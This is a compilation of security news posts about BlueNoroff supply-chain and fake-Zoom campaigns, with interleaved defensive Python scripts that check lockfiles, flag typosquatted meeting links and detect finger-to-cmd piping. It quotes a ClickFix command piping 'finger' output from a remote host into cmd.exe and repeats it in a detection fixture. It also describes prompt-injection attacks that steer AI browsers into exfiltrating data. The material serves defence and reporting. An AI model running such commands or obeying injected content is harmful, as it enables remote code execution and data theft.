📢 Mastra AI npm supply chain attack attributed to North Korean group Sapphire Sleet

🎯 Context

Source: BleepingComputer, published 20 June 2026.
📖 cyberveille: https://cyberveille.ch/posts/2026-06-22-attaque-supply-chain-npm-mastra-ai-attribuee-au-groupe-nord-coreen-sapphire-sleet/
🌐 source: https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/
#BlueNoroff #IOC #Cyberveille

In an update dated 19 June 2026, Microsoft officially attributed a supply chain attack targeting the npm ecosystem of the Mastra AI framework to the North Korean group Sapphire Sleet, also known as BlueNoroff.

🔓 Initial attack vector

The attackers compromised the npm account of the maintainer "ehindero", which had publishing rights across the entire Mastra package environment. That account was used to publish malicious updates to more than 140 packages in the @mastra scope.
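One practical check after a scope-wide compromise like this, as an added example (not code from BleepingComputer, Microsoft or the Mastra project): walk a package-lock.json, list every installed package under the affected scope, and flag versions not on a known-good list, tarballs resolved from a host other than the public registry, and entries with no integrity hash. The lockfile below is constructed for the demo, and the version numbers and known-good list are placeholders, not values from the advisory.

```python
import json
from urllib.parse import urlparse

# Constructed sample package-lock.json (lockfile v3 layout); not a real Mastra project.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"@mastra/core": "^0.10.0"}},
        "node_modules/@mastra/core": {
            "version": "0.10.3",
            "resolved": "https://registry.npmjs.org/@mastra/core/-/core-0.10.3.tgz",
            "integrity": "sha512-AAAA",
        },
        "node_modules/@mastra/memory": {
            "version": "0.10.4",
            "resolved": "https://registry.npmjs.org/@mastra/memory/-/memory-0.10.4.tgz",
            "integrity": "sha512-BBBB",
        },
        "node_modules/@mastra/rag": {
            "version": "0.10.5",
            # Hypothetical off-registry mirror and no integrity hash: worth a look.
            "resolved": "https://mirror.example.net/mastra/rag-0.10.5.tgz",
        },
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-CCCC",
        },
    },
})

# Hosts we accept tarballs from; a private proxy would be added here deliberately.
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}


def scoped_packages(lock_text: str, scope: str) -> dict:
    """Map package name -> lockfile entry for every installed package under `scope`
    (e.g. '@mastra'). The name is the part after the last 'node_modules/', so nested
    installs such as node_modules/a/node_modules/@mastra/x are included too."""
    lock = json.loads(lock_text)
    found = {}
    for path, entry in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        name = path.rsplit("node_modules/", 1)[-1]
        if name.startswith(scope + "/"):
            found[name] = entry
    return found


def review_findings(lock_text: str, scope: str, known_good: dict) -> list:
    """One finding per scoped package that needs a human look:
    - version not in the known-good set (or package absent from the list),
    - tarball resolved from a host outside TRUSTED_REGISTRY_HOSTS,
    - missing integrity hash, so npm could not have verified the tarball."""
    findings = []
    for name, entry in sorted(scoped_packages(lock_text, scope).items()):
        version = entry.get("version", "?")
        if version not in known_good.get(name, set()):
            findings.append(f"{name}@{version}: not on known-good list, check the advisory")
        host = urlparse(entry.get("resolved", "")).hostname or ""
        if host not in TRUSTED_REGISTRY_HOSTS:
            findings.append(f"{name}@{version}: tarball resolved from untrusted host '{host}'")
        if not entry.get("integrity"):
            findings.append(f"{name}@{version}: no integrity hash in lockfile")
    return findings


if __name__ == "__main__":
    # Placeholder known-good versions; use the vendor's published clean versions instead.
    good = {"@mastra/core": {"0.10.3"}, "@mastra/memory": {"0.10.4"}}
    for line in review_findings(SAMPLE_LOCK, "@mastra", good):
        print(line)
```

Run it against a real lockfile by reading the file into `lock_text`; the point is to get the full inventory of the scope, including nested installs that `package.json` alone does not show, before deciding what to roll back or rebuild.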

Sapphire Sleet Targets macOS

We recently observed a multi-stage macOS intrusion campaign conducted by the North Korean state-sponsored threat group Sapphire Sleet (also tracked as BlueNoroff / UNC1069). The campaign specifically targets macOS environments within high-value financial sectors, including venture capital firms, Web3 developers, and cryptocurrency organizations. By leveraging signed, built-in system applications like the Apple Script Editor and Finder, the malware operates outside traditional macOS security enforcement boundaries, suppresses system security alerts, and executes arbitrary code directly under the guise of an authentic user update. This aligns with broader public reporting on macOS-focused intrusion tradecraft. Initial access relied on targeted social engineering in which victims were instructed to execute a fake Zoom SDK update component, leading to user-assisted execution and follow-on payload delivery.

Pulse ID: 6a19675cc4b620f11791ba1b
Pulse Link: https://otx.alienvault.com/pulse/6a19675cc4b620f11791ba1b
Pulse Author: AlienVault
Created: 2026-05-29 10:15:56

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlueNoroff #CyberSecurity #InfoSec #Korea #Mac #MacOS #Malware #NorthKorea #OTX #OpenThreatExchange #RAT #RCE #SocialEngineering #Web3 #Zoom #bot #cryptocurrency #developers #AlienVault

BlueNoroff targets the Web3 sector via fake Zoom meetings, ClickFix and AI deepfakes

🔍 Context

On 27 April 2026 Arctic Wolf Labs published a detailed technical analysis of an active intrusion that began on 23 January 2026, targeting a North American Web3/cryptocurrency company. The attack is attributed with high confidence to BlueNoroff, a financially motivated subgroup of North Korea's Lazarus Group (RGB/DPRK), as part of the campaign known as "fake conference" / SnatchCrypto.

🎭 Initial vector: sophisticated social engineering

The attacker impersonated a legal officer of a Fintech/Crypto/iGaming firm via Calendly, scheduling a meeting five months in advance. The generated Google Meet invitation was modified to replace the legitimate link with a typosquatted Zoom URL (e.g. uu03webzoom[.]us). More than 80 typosquatted Zoom and Teams domains were identified on the same infrastructure between late 2025 and March 2026.
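The link substitution described above is mechanical enough to check for. The following added example (not code from Arctic Wolf or CyberVeille) classifies every URL in an invite as a legitimate meeting host, a lookalike that merely contains a brand name, or something else, and raises an alert when the invite claims one provider but links to another. The legitimate-domain list is an assumption kept deliberately short, the invite text is constructed, and only the lookalike domain comes from the report.

```python
import re
from urllib.parse import urlparse

# Legitimate meeting hosts per brand (assumed list); real subdomains of these,
# such as us02web.zoom.us, are accepted as legitimate.
LEGIT_MEETING_DOMAINS = {
    "zoom": ("zoom.us", "zoom.com"),
    "teams": ("teams.microsoft.com", "teams.live.com"),
    "meet": ("meet.google.com",),
}

URL_RE = re.compile(r"https?://[^\s<>\"')]+")


def refang(url: str) -> str:
    """Turn a defanged URL from a report (hxxp, [.]) back into a parseable one."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def classify_url(url: str) -> tuple:
    """Return (kind, brand) where kind is 'legit', 'lookalike' or 'other'.
    'legit' needs an exact match or a real subdomain of a legitimate domain;
    'lookalike' means the hostname merely contains the brand name, which is how
    uu03webzoom.us imitates us03web.zoom.us: it ends in 'zoom.us' but not '.zoom.us'."""
    host = (urlparse(refang(url)).hostname or "").lower()
    for brand, domains in LEGIT_MEETING_DOMAINS.items():
        if any(host == d or host.endswith("." + d) for d in domains):
            return ("legit", brand)
    for brand in LEGIT_MEETING_DOMAINS:
        if brand in host:
            return ("lookalike", brand)
    return ("other", "")


def check_invite(invite_text: str, expected_provider: str) -> list:
    """Alerts for a calendar invite: any lookalike meeting domain, any legitimate
    meeting link for a different provider than the invite claims, and the absence
    of a link to the expected provider."""
    alerts = []
    seen_expected = False
    for url in URL_RE.findall(invite_text):
        kind, brand = classify_url(url)
        host = urlparse(refang(url)).hostname
        if kind == "lookalike":
            alerts.append(f"lookalike {brand} domain: {host}")
        elif kind == "legit":
            if brand == expected_provider:
                seen_expected = True
            else:
                alerts.append(f"invite says {expected_provider} but link goes to {brand}: {host}")
    if not seen_expected:
        alerts.append(f"no link to the expected {expected_provider} service")
    return alerts


# Constructed invite body (not the real invitation): a Google Meet invite whose link
# has been swapped for the typosquatted Zoom domain named in the Arctic Wolf report.
SAMPLE_INVITE = """Legal sync (Calendly booking)
Joining info: Google Meet
Join here: https://uu03webzoom[.]us/j/0000000000?pwd=abc
Agenda and NDA to follow."""

if __name__ == "__main__":
    for alert in check_invite(SAMPLE_INVITE, "meet"):
        print(alert)
```

The suffix check is the important detail: matching on `endswith("zoom.us")` would accept uu03webzoom.us, so the code requires the dot before the legitimate domain.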

BlueNoroff Uses ClickFix, Fileless PowerShell, and AI-Generated Fake Zoom Meetings to Target Web3 Sector
#BlueNoroff
https://arcticwolf.com/resources/blog/bluenoroff-uses-clickfix-fileless-powershell-and-ai-generated-zoom-meetings-to-target-web3-sector/

Arctic Wolf has identified a targeted intrusion against a North American Web3/cryptocurrency company, which we attribute with a high confidence level to BlueNoroff, a financially motivated subgroup of DPRK’s Lazarus Group.

Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:

Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/logitech-confirms-data-breach-after-clop-extortion-attack/

RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.

📰 The Hacker News | https://thehackernews.com/2025/11/rondodox-exploits-unpatched-xwiki.html

'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger [email protected][.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.

📰 The Hacker News | https://thehackernews.com/2025/11/five-us-citizens-plead-guilty-to.html

#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement
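A detection one could run over endpoint telemetry for the finger technique in the digest above, as an added example (not from BleepingComputer or the reporting it summarises): it parses Sysmon-style process-creation and network-connection events, flags a command line that pipes finger output into a shell, flags outbound connections to TCP/79, and, as a lower-severity signal, any launch of finger.exe at all. The events are constructed, the remote host and addresses are placeholders, and the finger.exe-launch rule assumes the binary is otherwise unused on the fleet.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (key=value fields), not real telemetry. Event ID 1 is
# process creation and Event ID 3 a network connection, as in Sysmon.
SAMPLE_EVENTS = [
    'EventID=1 Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c finger user@finger.example.org | cmd"',
    'EventID=1 Image="C:\\Windows\\System32\\finger.exe" '
    'CommandLine="finger user@finger.example.org"',
    'EventID=3 Image="C:\\Windows\\System32\\finger.exe" '
    'DestinationIp=203.0.113.10 DestinationPort=79 Protocol=tcp',
    'EventID=1 Image="C:\\Program Files\\Git\\bin\\git.exe" CommandLine="git pull origin main"',
    'EventID=3 Image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" '
    'DestinationIp=203.0.113.20 DestinationPort=443 Protocol=tcp',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# The ClickFix pattern from the article: finger output piped straight into a shell.
FINGER_PIPE_RE = re.compile(
    r"\bfinger(?:\.exe)?\s+\S+@\S+\s*\|\s*(?:cmd(?:\.exe)?|powershell|pwsh)", re.I
)


def parse_event(line: str) -> dict:
    """Parse one key=value line into a dict, stripping the quotes around values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def detect(lines: list) -> list:
    """Return one alert dict per matching event: which line, which rule, how severe."""
    alerts = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        image = PureWindowsPath(ev.get("Image", "")).name.lower()
        if ev.get("EventID") == "1":
            if FINGER_PIPE_RE.search(ev.get("CommandLine", "")):
                alerts.append({"line": idx, "severity": "high",
                               "rule": "finger output piped into a shell"})
            elif image == "finger.exe":
                # Assumption for this demo: finger.exe is unused on the fleet, so any
                # launch is worth a look even without a pipe.
                alerts.append({"line": idx, "severity": "low",
                               "rule": "finger.exe launched"})
        elif ev.get("EventID") == "3" and ev.get("DestinationPort") == "79":
            # Matches the article's advice to block outbound TCP/79.
            alerts.append({"line": idx, "severity": "medium",
                           "rule": "outbound finger connection (TCP/79)"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"line {a['line']}: [{a['severity']}] {a['rule']}")
```

The network rule fires independently of the process rule, so an egress block on TCP/79 plus this alert covers both the case where the pipe is visible in the command line and the case where the finger client is invoked some other way.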

Alright team, it's been a pretty packed 24 hours in the cyber world! We've got updates on nation-state breaches, some nasty new malware, critical vulnerabilities under active exploitation, and some significant discussions around AI and data privacy. Let's dive in:

F5 Nation-State Breach Update 🛡️
- F5 has provided an update on the nation-state attack disclosed on 15 October, confirming the attacker had prolonged access to their systems.
- The incident led to emergency updates for BIG-IP software/hardware and the theft of some customer configuration data and 44 undisclosed vulnerabilities.
- F5 claims the impact on customers was "limited" and the exfiltrated data "not sensitive," while also boosting security with CrowdStrike EDR for BIG-IP and an enhanced bug bounty program.
🤫 CyberScoop | https://cyberscoop.com/f5-attack-limited-impact-earnings-call/

Gmail "Breach" Reports Debunked 📧
- Reports circulating about a "massive Gmail breach" affecting 183 million accounts have been clarified as false by Google.
- The confusion stemmed from a misunderstanding of aggregated infostealer logs, which contain old, recycled credentials, not evidence of a new Gmail intrusion.
- Google reiterates its strong defences and active monitoring, prompting password resets for affected users when old credentials resurface.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/gmail_breach_fake_news/

SideWinder APT Evolves Attack Chain 🐍
- The SideWinder APT group is targeting South Asian diplomats with a new infection chain using malicious PDFs and ClickOnce applications.
- Spear-phishing emails deliver malware like ModuleInstaller and StealerBot, designed for extensive data collection including screenshots, keystrokes, and passwords.
- Attackers employ sophisticated evasion techniques, including legitimate signed executables, region-locked C2 communications, and dynamic payload paths.
👾 The Hacker News | https://thehackernews.com/2025/10/sidewinder-adopts-new-clickonce-based.html

BlueNoroff's GhostCall & GhostHire Campaigns 👻
- North Korean-linked BlueNoroff (Lazarus Group sub-cluster) is actively targeting Web3 and blockchain sectors with new campaigns: GhostCall and GhostHire.
- GhostCall uses fake Zoom/Microsoft Teams calls to deploy macOS malware, while GhostHire lures Web3 developers with booby-trapped GitHub job assessment projects.
- These campaigns deploy a range of sophisticated malware (e.g., DownTroy, CosmicDoor, RooTroy) to harvest credentials and sensitive data from development environments, cloud platforms (AWS, Google Cloud, Azure), and communication tools, with generative AI reportedly accelerating malware development.
👾 The Hacker News | https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html

Herodotus Android Malware Mimics Humans 🤖
- A new Android banking trojan, Herodotus, has been discovered, capable of full device control to steal from banking and crypto apps.
- Its unique evasion technique involves mimicking human typing with random pauses when inputting stolen credentials or transaction details, making automated detection harder.
- Observed in active campaigns in Italy and Brazil, disguising itself as legitimate banking security apps, highlighting the need for advanced fraud controls beyond simple keystroke analysis.
🗞️ The Record | https://therecord.media/android-malware-mimics-humans-avoid-detection

WSUS RCE Under Active Exploitation 🚨
- A critical RCE vulnerability, CVE-2025-59287, in Windows Server Update Services (WSUS) is under active exploitation by a new threat actor, UNC6512.
- This unauthenticated deserialization flaw affects Windows Server 2012-2025, allowing arbitrary code execution on exposed WSUS instances.
- Microsoft's initial patch was incomplete, leading to emergency updates, and telemetry shows widespread exploitation attempts, with attackers focusing on initial access and internal reconnaissance.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/27/microsoft_wsus_attacks_multiple_orgs/

AI Browsers Vulnerable to Prompt Injection 🧠
- New AI browsers like OpenAI's Atlas, Comet, and Fellou are highly susceptible to prompt injection, both direct and indirect, and cross-site request forgery.
- Attackers can manipulate web content (e.g., hidden text, malicious URLs) to inject commands, leading to data exfiltration, malicious actions (like deleting files), or poisoning the AI's memory.
- Security experts consider prompt injection an "unsolved security problem" inherent to LLMs, urging vendors to implement low privileges, human consent, vetted sources, and robust output controls.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/ai_browsers_prompt_injection/
🤫 CyberScoop | https://cyberscoop.com/openai-atlas-splx-research-cloaking-attacks-browser-agents/

Chatbots Parrot Russian Propaganda 🇷🇺
- A study by the Institute for Strategic Dialogue (ISD) found popular chatbots (ChatGPT, Gemini, Grok, DeepSeek) cited Russian state-attributed sources in up to 25% of answers about the Ukraine war.
- This "LLM grooming" technique involves miscreants laundering state media talking points online to influence AI models, with biased or malicious prompts increasing the likelihood of pro-Kremlin content.
- Google's Gemini performed best by implementing safety guardrails, but the findings raise serious concerns about AI's role in disinformation and the enforceability of sanctions on state-backed media.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/chatbots_still_parrot_russian_state/

Human Cost of MoD Afghan Data Breach 💔
- New research submitted to the UK Parliament reveals the devastating human toll of the Ministry of Defence's 2022 Afghan relocation scheme data breach.
- The leak directly led to threats, violent assaults, and even the deaths of family members and colleagues for 49 of the 231 affected individuals, with 87% reporting other personal risks.
- The report highlights severe mental health impacts and calls for urgent government action, including expedited relocations and redress for all affected Afghans.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/impact_afghan_data_breach/

Clearview AI Faces Criminal Charges in EU ⚖️
- Privacy advocacy group Noyb has filed a criminal complaint against Clearview AI in Austria for repeatedly ignoring over $100 million in EU GDPR fines.
- Clearview AI's practice of scraping social media images for facial recognition without consent has been deemed illegal across Europe, but the company has largely evaded enforcement.
- The complaint leverages Article 84 of GDPR, which allows criminal proceedings against managers of organisations flouting data protection laws, aiming to set a precedent for cross-border enforcement.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/noyb_criminal_charges_clearview/

US Declines UN Cybercrime Treaty 🌐
- The United States notably declined to sign the landmark UN Convention against Cybercrime, which was signed by over 70 countries including the UK, EU, China, and Russia.
- The treaty aims to create a global mechanism for coordinating against digital crime, facilitating electronic evidence sharing, and criminalising internet-dependent offenses.
- The US State Department is "reviewing" the treaty, which has faced criticism from the tech industry and human rights groups over concerns it could criminalise cybersecurity research and enable broad surveillance by authoritarian regimes.
🗞️ The Record | https://therecord.media/us-declines-signing-cybercrime-treaty

NYPD Surveillance System Lawsuit 👁️
- The Surveillance Technology Oversight Project (STOP) is suing the NYPD, alleging its Domain Awareness System (DAS) is unconstitutional.
- DAS, a partnership with Microsoft since 2012, integrates citywide cameras, biometrics, digital communication monitors, and data analytics to track and profile New Yorkers.
- The lawsuit argues DAS violates constitutional rights to freedom of speech and protection from unreasonable searches, with newly obtained records showing its extensive data aggregation capabilities accessible to all NYPD officers.
🗞️ The Record | https://therecord.media/nypd-domain-awareness-system-civil-rights-lawsuit

#CyberSecurity #ThreatIntelligence #Vulnerabilities #RCE #WSUS #APT #SideWinder #BlueNoroff #Malware #AndroidMalware #PromptInjection #AIDisinformation #DataPrivacy #GDPR #CybercrimeTreaty #Surveillance #InfoSec #IncidentResponse

🚨 BlueNoroff APT launches GhostCall & GhostHire campaigns targeting Web3 & VC sectors.
🎭 Fake Zoom calls & GitHub assessments → multi-stage macOS + Windows malware.
💰 Steals crypto wallets, API keys, and cloud data.

Full report:
https://www.technadu.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire-target-web3-venture-capital-sectors-via-advanced-social-engineering/612075/

#CyberSecurity #APT #BlueNoroff #Web3Security #TechNadu

Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs

Kaspersky GReAT experts dive deep into the BlueNoroff APT's GhostCall and GhostHire campaigns. Extensive research detailing multiple malware chains targeting macOS, including a stealer suite, fake Zoom and Microsoft Teams clients and ChatGPT-enhanced images.

Kaspersky
"North Korean Hacker Group Bluenoroff Attempts Hacking Attack via Zoom" published by CriminalIP. #BlueNoroff, #DPRK, #CTI https://www.criminalip.io/knowledge-hub/blog/28728
"Bluenoroff (APT38) Live Infrastructure Hunting" published by Darkatlas. #BlueNoroff, #DPRK, #CTI https://darkatlas.io/blog/bluenoroff-apt38-live-infrastructure-hunting